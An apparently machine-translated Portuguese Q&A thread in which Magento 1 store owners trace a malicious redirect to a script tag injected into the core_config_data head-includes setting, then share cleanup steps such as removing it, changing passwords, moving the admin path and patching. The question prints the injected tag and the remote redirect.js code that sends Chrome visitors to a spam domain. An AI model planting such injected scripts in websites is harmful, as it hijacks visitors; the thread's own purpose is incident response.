O site começa a ser redirecionado para outro URL

9

Maybe it's infected by some virus.

Meu site começa a redirecionar para esses URL infectados.

http://mon.setsu.xyz
e algum tempo https://tiphainemollard.us/index/?1371499155545
Links infectados

o que eu fiz para resolver.

  1. Arquivo .htaccess comentado (nada acontece)
  2. Pasta de inclusão comentada (nada acontece)
  3. Servidor completo verificado (nada acontece, nenhum malware de vírus foi encontrado)
  4. CSS, mídia e caminho js alterados do banco de dados apenas para garantir que o PHP ou qualquer js esteja funcionando (nada acontece)
  5. select * from core_config_data where path like '%secure%';todos os links estão ok ATUALIZAÇÃO

Pesquisei no Google e muitos artigos foram escritos sobre isso, mas eles sugerem que foi um problema no navegador ou meu sistema está infectado. Um artigo sobre isso, mesmo que eu abra o site no meu telefone ou no meu laptop pessoal, os problemas são os mesmos.

ATUALIZAÇÃO 2

Eu encontrei a linha no banco de dados que é afetada. (como Boris K. também dizendo)

No valor da core_config_data tabela design/head/includestem um

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

O qual será inserido na seção principal no carregamento da página.

Se você visitar o URL acima, receberá um script de redirecionamento que é

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

O site do cliente está funcionando desde a tarde, depois que eu removi o script. But the main problem is how that script inserted into the database.

Um patch também está desatualizado, então eu atualizei esse patch também.

ATUALIZAÇÃO 3 O site está infectado novamente. Este é o script inserido na seção Admin ( Admin-> Configuração-> Geral-> Design-> HTML Head-> Diversos scripts ) admin

E na coluna do banco de dados base de dados

Não sei o que fazer agora. Como alterei todas as senhas, excluímos todos os usuários antigos.

ATUALIZAÇÃO 3

Até agora, esse erro não ocorre e, ao seguir as etapas acima, podemos solucionar esse problema.

UPDATE :: 4 Sempre instale patches, pois isso me ajuda em projetos para tornar a loja menos propensa a esses tipos de problemas e os patches também são importantes. Pode-se usar https://magescan.com/ para verificar os problemas em seu site.

inrsaurabh
fonte
no seu sistema pode ser afetado, verifique. verifique seu navegador.
Rama Chandran M
@ RamaChandran quando eu google sobre este URL quase todas as sugestões de que era problema do navegador. Abri o site no meu telefone também mesmo problema.
Inrsaurabh
Por favor, forneça o URL do seu site
Rama Chandran M
11
Excluí <script src = "<a href =" melissatgmt.us/redirect_base/redirect.js " >https://…> "id =" 1371499155545 "> </script> de design / head / includes. Ainda não funcionou. E depois que visitei meu site, esse código javascrip está aparecendo novamente. Você tem algum pensamento? Endereço do site é hdvideodepot.com
Mark
11
Você pode adicionar a tag da versão magento?
sv3n

Respostas:

6

Encontrei o código injetado na core_config_datatabela, abaixo design/head/includes. Removido e agora o site voltou ao normal.

ATUALIZAÇÃO: Como todo mundo mencionou, aconteceu de novo esta manhã. Desta vez, me livrei mais facilmente do painel de administração em System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. Esta é uma enorme vulnerabilidade, espero que o Magento esteja trabalhando em um patch.

ATUALIZAÇÃO 2: O script voltou novamente, então alterei a senha do banco de dados e limpei o cache. Cerca de uma hora depois, o script está de volta. Então, eu não acho que está sendo adicionado através do banco de dados. Acabei de alterar minha senha de administrador, vamos ver se ela volta novamente.

ATUALIZAÇÃO 3: Desde que eu mudei a senha de administrador ontem nos dois sites afetados, cerca de 24 horas depois, os dois ainda estão limpos.

Boris K.
fonte
2
uau, isso é uma enorme violação de segurança, alguma ideia de que tipo de vulnerabilidade a causou?
Yehia A.Salam
3
Deve ser um buraco nas versões mais antigas do Magento. Eu tenho um site criado no Magento 2.1 que não foi afetado, mas todos os sites abaixo da versão 2 estão sendo redirecionados.
Boris K.
Este é um enorme problema de segurança. Alguém sabe como o código foi injetado na tabela? Essa tabela é onde, na área de administração, podemos adicionar estilos e javascript ao rodapé / cabeçalho do site. Como um hacker pode comprometer isso? Isso significa que eles tiveram acesso ao administrador?
Amendoim
ele continua ficando para trás depois de excluí-lo, não sei o que fazer
Yehia A.Salam
Detectei usuários mal-intencionados em Sistema> Permissões> Usuários. Após removê-los (e corrigir a tabela core_config_data e alterar a senha do administrador), parece estável, mas eu gostaria de saber como isso aconteceu em primeiro lugar. O buraco / porta dos fundos ainda pode estar lá e é um mistério.
Amendoim
3

Mesmo problema em outro site magento. Descobri que um script é injetado na seção HEAD da página, solicitando redirect_base / redirect.js do melissatgmt.us (depois alterado para outro domínio), mas não consigo descobrir como essa merda é injetada.

ATUALIZAÇÃO : Conforme mencionado por outras pessoas, localizou a entrada na tabela core_config_data e a removeu, mas o registro estava de volta na próxima página recarregada. Mudei a senha do banco de dados e agora parece ser derrotada. Não tenho certeza se a alteração da senha é a solução definitiva, mas de qualquer maneira é uma melhoria de segurança.

ATUALIZAÇÃO 2 : Conforme declarado por Jix Sas, acessar a partir da configuração na administração do magento é uma solução mais fácil do que acessar diretamente a tabela do banco de dados. Mas a merda continua voltando a cada 10/15 minutos.

ATUALIZAÇÃO 3 : Senha de administrador alterada, verificada e salva algumas páginas cms (serviço ao cliente e sobre nós) que pareciam estar de alguma forma infectadas, cache desativado, cache limpo várias vezes (após cada verificação e salvamento da página cms 'infectada') mais script injetado nas últimas 8 horas.

ConsuLanza Informatica
fonte
Sim, está certo, eu tenho a linha que é afetada.
Inrsaurabh
Note que o administrador do magento é acessível sem problemas e no log da web eu posso ver que os acessos aos bot não são afetados. Eu acho que o malware é limitado ao frontend e verifica o agente do usuário do navegador.
ConsuLanza Informatica
então você sabia de onde foi injetado?
Yehia A.Salam
sim eu posso confirmar que ele mantém a voltar a cada 10/15 minutos, mesmo depois de apagar a entrada do banco de dados
Yehia A.Salam
2

Mudei o caminho para o painel de administração app/etc/local.xmle isso ajuda. O script não é mais adicionado a design/head/includes.

Explicação:

No app/etc/local.xmleu mudei <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>anteriormente era sitedomain.com/admin, e agora o caminho para o painel de administração será sitedomain.com/new_admin_path

Eugenia
fonte
Desculpe eu não conseguir o que você u que, gentilmente explicarwhich path u chagned
inrsaurabh
Na app / etc / local.xml eu mudei <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Anteriormente era sitedomain.com/admin, e agora caminho ao painel de administração será sitedomain.com/new_admin_path
Eugenia
Ok eu tenho que o ur sugerindo
inrsaurabh
1

É um alívio tão grande que restaurei meu site 10 vezes desde a manhã.

O Bug continua Vindo de novo e de novo.

Qual é a solução definitiva?

Alterar senha do banco de dados? Alterar senha raiz? Algum patch foi lançado?

Não tenho certeza se isso está relacionado, recebi abaixo um email de uma consultoria de segurança

Querido senhor ou senhora,

Somos a Hatimeria, uma empresa de desenvolvimento Magento sediada na Suíça, Polônia e Holanda.

Recentemente, começamos a trabalhar com um novo cliente e assumimos o servidor antigo. No momento em que acessamos o servidor, deparamos com alguns malwares, com os quais os hackers conseguiram dominar o servidor do cliente e usá-lo como uma "máquina de hackers" para invadir outros sites. É claro que o cliente não sabia que isso estava acontecendo em seu servidor.

Encontramos credenciais de banco de dados do seu site que foram invadidas por esse servidor. É claro que não faremos nada com isso, mas me sinto obrigado a entrar em contato com você e informar o que está acontecendo. O hack foi feito através da vulnerabilidade Magento Cacheleak, que ainda pode estar presente em sua loja no momento.

Aconselho que você cuide imediatamente dessa vulnerabilidade e altere sua senha do banco de dados. Nossos técnicos dizem que isso deve levar cerca de 30 minutos.

No site MageReport, você pode ver o que mais seu site pode estar vulnerável: https://www.magereport.com/scan/?s=

Minha intenção principal deste e-mail não é fazer uma aquisição de clientes, mas se você precisar de ajuda para proteger sua loja ou tiver outras dúvidas, teremos prazer em ajudar.

Com os melhores cumprimentos, Thomas Tanner

Então, eu acho que a solução é alterar a senha do DB

Mohit Khatri
fonte
1

Precisamos entender qual é a principal causa dessas injeções de spam

Se seu site foi injetado, verifique-o em TODAS AS TRÊS verificações de malware

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

Sinto que isso se deve à falta do patch de segurança! Se um patch estiver faltando, RELATAR SOB ESTE TÓPICO .

  1. Alterar senha de acesso à hospedagem Alterar senha do banco de dados Alterar senhas de login do administrador OCULTAR ADMIN AND DOWNLOAD URLs e ocultar / RSS / da exibição pública.

  2. Faça uma verificação completa de vírus no site, seu provedor de hospedagem poderá verificar o site se você não puder fazer isso sozinho.

  3. Vá para Sysytem -> Usuários e veja se há usuários registrados NÃO AUTORIZADOS na conta.

Ícone
fonte
0

Corrigi o problema. Mesmo depois eu deletei FHIS arquivo a partir <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>da core_config_datatabela no design/head/includesvalor. Não resolveu o problema. o código do script foi inserido repetidamente. Para corrigir o problema, basta seguir estas três etapas.

  1. Exclua o código do script da core_config_datatabela em design/head/includes.
  2. Altere a senha do banco de dados, incluindo app/etc/local.xmlcredencial.
  3. Limpar cache na pasta raiz do Magento usando este comando rm -rf var/cache/*

ps Passei o dia todo. Felizmente, isso funcionará para você. E certifique-se de fazer backup do arquivo o tempo todo.

Marca
fonte
0

exatamente a mesma coisa aconteceu comigo hoje! redirecionando para o mesmo site. no entanto, encontrei o script no painel de administração do Magento em configuration> design> html head> misc scripts. havia este script: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> eu o removi de lá e o site está funcionando bem. não tenho a pasta em que você disse que encontrou o script. Alguma idéia de onde poderia estar? (como você conhece o caminho para HTML head> misc scripts)

Além disso, o que você fez recentemente? talvez possamos descobrir a causa? para mim, instalei um pop-up de boletim informativo gratuito que pode ser a causa. e se você?

UPDATE: bem, agora o script está de volta. Alguém me diz como posso acessar esse script do banco de dados para removê-lo, por favor?

ATUALIZAÇÃO 2: conforme declarado por Mark, remover o script E alterar a senha do banco de dados interrompeu o retorno do script. Se alguém souber o nome dessa vulnerabilidade ou se houver perigo para o pagamento dos clientes, informe-nos.

جيلبير
fonte